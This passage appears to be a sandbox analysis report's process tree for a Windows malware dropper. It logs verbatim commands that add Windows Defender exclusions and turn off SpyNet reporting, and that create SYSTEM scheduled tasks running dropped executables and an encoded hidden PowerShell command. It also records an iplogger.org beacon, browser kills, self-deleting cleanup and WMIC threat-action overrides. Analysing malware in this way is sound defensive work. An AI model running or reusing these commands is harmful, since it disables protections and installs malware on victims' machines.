                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                      13⤵
                                                                                                                                                        PID:5352
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                          14⤵
                                                                                                                                                            PID:8408
                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                              15⤵
                                                                                                                                                                PID:4632
                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:9044
                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                              13⤵
                                                                                                                                                                PID:1876
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                  14⤵
                                                                                                                                                                    PID:7280
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      15⤵
                                                                                                                                                                        PID:4644
                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        15⤵
                                                                                                                                                                          PID:9044
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /CREATE /TN "gpzdwrDsC" /SC once /ST 05:34:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                      13⤵
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:8884
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /run /I /tn "gpzdwrDsC"
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:9512
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /DELETE /F /TN "gpzdwrDsC"
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:5140
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 10:48:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\iXkrQovqyvDrylo\RfCazPt.exe\" W8 /site_id 216660 /S" /V1 /F
                                                                                                                                                                          13⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:6196
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 05:08:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\ZQxXSkp.exe\" za /site_id 216660 /S" /V1 /F
                                                                                                                                                                          13⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:6816
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /DELETE /F /TN "bRciptYQhTCMvEFWGJ"
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:6576
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:6784
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                              13⤵
                                                                                                                                                                                PID:8044
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"\STjmdXhOU\UQTbVo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArGDBXWmyYtLacf" /V1 /F
                                                                                                                                                                                13⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:9964
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /CREATE /TN "ArGDBXWmyYtLacf2" /F /xml "\STjmdXhOU\wxptzrr.xml" /RU "SYSTEM"
                                                                                                                                                                                13⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:8796
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /END /TN "ArGDBXWmyYtLacf"
                                                                                                                                                                                13⤵
                                                                                                                                                                                  PID:8804
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /DELETE /F /TN "ArGDBXWmyYtLacf"
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:1360
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "dqMFPCMVHmhnSY" /F /xml "\gaSWcYIjjvwU2\oWfnIFj.xml" /RU "SYSTEM"
                                                                                                                                                                                    13⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:9256
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "sOuBCsGGBJoge2" /F /xml "\QPFeEjmgnBUOfRVB\zZLqhJf.xml" /RU "SYSTEM"
                                                                                                                                                                                    13⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:9340
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qdkvmxjm.501\76.exe & exit
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:8300
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\qdkvmxjm.501\76.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\qdkvmxjm.501\76.exe
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:8548
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-OGVC3.tmp\76.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-OGVC3.tmp\76.tmp" /SL5="$2055A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\qdkvmxjm.501\76.exe"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:8592
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\qdkvmxjm.501\76.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\qdkvmxjm.501\76.exe" /SILENT
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:4120
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-P6S5I.tmp\76.tmp
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-P6S5I.tmp\76.tmp" /SL5="$105E8,1570064,56832,C:\Users\Admin\AppData\Local\Temp\qdkvmxjm.501\76.exe" /SILENT
                                                                                                                                                                                            13⤵
                                                                                                                                                                                              PID:8236
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-EDH2V.tmp\postback.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-EDH2V.tmp\postback.exe" ss1
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                  PID:10200
                                                                                                                                                                                                • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:9244
                                                                                                                                                                                                    • C:\1215016b35a023497338e3\Setup.exe
                                                                                                                                                                                                      C:\1215016b35a023497338e3\\Setup.exe /q /norestart /x86 /x64 /web
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                        PID:5632
                                                                                                                                                                                                    • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:10228
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cqvczraa.uvw\askinstall52.exe & exit
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:8796
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\cqvczraa.uvw\askinstall52.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\cqvczraa.uvw\askinstall52.exe
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:3980
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                        PID:5220
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:9408
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wdthldpz.okm\customer2.exe & exit
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:9184
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wdthldpz.okm\customer2.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\wdthldpz.okm\customer2.exe
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:8768
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vipudksj.swn\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                          PID:8728
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vipudksj.swn\gcleaner.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\vipudksj.swn\gcleaner.exe /mixfive
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:7896
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nn23vuki.5yh\Text.exe & exit
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:6244
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\nn23vuki.5yh\Text.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\nn23vuki.5yh\Text.exe
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:8600
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2qkoco1j.5bj\autosubplayer.exe /S & exit
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:8452
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2b3vamck.wtl\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:9736
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2b3vamck.wtl\installer.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\2b3vamck.wtl\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:10048
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qxuppees.ty2\app.exe /8-2222 & exit
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:7232
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qxuppees.ty2\app.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\qxuppees.ty2\app.exe /8-2222
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:9008
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5tf3wkvj.exu\bumperWW1.exe & exit
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                            PID:9432
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun061927332abbf6f4e.exe
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1584
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun061927332abbf6f4e.exe
                                                                                                                                                                                                                      Sun061927332abbf6f4e.exe
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:2832
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7090716.scr
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7090716.scr" /S
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:4180
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6376237.scr
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6376237.scr" /S
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:2144
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7876557.scr
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7876557.scr" /S
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:4780
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 884
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:3700
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6872942.scr
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6872942.scr" /S
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:4668
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun06abb9b770e9b36c.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:2252
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06abb9b770e9b36c.exe
                                                                                                                                                                                                                        Sun06abb9b770e9b36c.exe
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:3256
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun06f07d4ec3d1.exe
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:1512
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06f07d4ec3d1.exe
                                                                                                                                                                                                                          Sun06f07d4ec3d1.exe
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:68
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Sun06b8d4aadadbfe71.exe
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:2104
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06b8d4aadadbfe71.exe
                                                                                                                                                                                                                            Sun06b8d4aadadbfe71.exe
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            PID:3780
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\dztoKQ7Dz7ZZBBqSbfW3YOpV.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\dztoKQ7Dz7ZZBBqSbfW3YOpV.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:4804
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\qTDxWa6ebMXsL7eWgCf1HjKT.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\qTDxWa6ebMXsL7eWgCf1HjKT.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:6064
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\a2_880NsEAf6KwRToLVuzGGW.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\a2_880NsEAf6KwRToLVuzGGW.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:6056
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "a2_880NsEAf6KwRToLVuzGGW.exe" /f & erase "C:\Users\Admin\Documents\a2_880NsEAf6KwRToLVuzGGW.exe" & exit
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:6440
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                          taskkill /im "a2_880NsEAf6KwRToLVuzGGW.exe" /f
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                          PID:6312
                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\6t2cAKh4Xq1vYNRyceYTpdHb.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\6t2cAKh4Xq1vYNRyceYTpdHb.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:6044
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:5008
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\qw2GYuB7AdBCWz2KpscSf2bW.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\qw2GYuB7AdBCWz2KpscSf2bW.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:6036
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\x1fMQ6IHqgLfdIPkUfwlw548.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\x1fMQ6IHqgLfdIPkUfwlw548.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:6024
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im x1fMQ6IHqgLfdIPkUfwlw548.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\x1fMQ6IHqgLfdIPkUfwlw548.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:7460
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                  taskkill /im x1fMQ6IHqgLfdIPkUfwlw548.exe /f
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                  PID:4392
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                  PID:9588
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\LKMI9wbf9d4LvLQQnIdeq0xj.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\LKMI9wbf9d4LvLQQnIdeq0xj.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:6008
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:5920
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\f.exe
                                                                                                                                                                                                                                                      "f.exe"
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:4772
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\237843444.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\237843444.exe"
                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                            PID:1728
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\wwi.exe
                                                                                                                                                                                                                                                          "wwi.exe"
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:1556
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wwl.exe
                                                                                                                                                                                                                                                            "wwl.exe"
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:5416
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:5044
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\YPJzZfjmp_W1DGIh2Jy0pYGW.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\YPJzZfjmp_W1DGIh2Jy0pYGW.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:5992
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\xSQ3ur2Ct_Lhiww8RrCi8nS0.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\xSQ3ur2Ct_Lhiww8RrCi8nS0.exe"
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:5984
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                    PID:5260
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:5460
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                        PID:4244
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\0e4h2Jil5qBY4Z3EQPAiwg5I.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\0e4h2Jil5qBY4Z3EQPAiwg5I.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:5972
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:312
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\qwWkdooTxLPCTpeqNWfg5du8.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\qwWkdooTxLPCTpeqNWfg5du8.exe"
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                PID:8164
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\iZ40JvLTuacsxTdHceBZ9jBr.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\iZ40JvLTuacsxTdHceBZ9jBr.exe"
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                  PID:7388
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSE601.tmp\Install.exe
                                                                                                                                                                                                                                                                                    .\Install.exe
                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                      PID:3004
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSE7E5.tmp\Install.exe
                                                                                                                                                                                                                                                                                        .\Install.exe /S /site_id "668658"
                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                          PID:7672
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
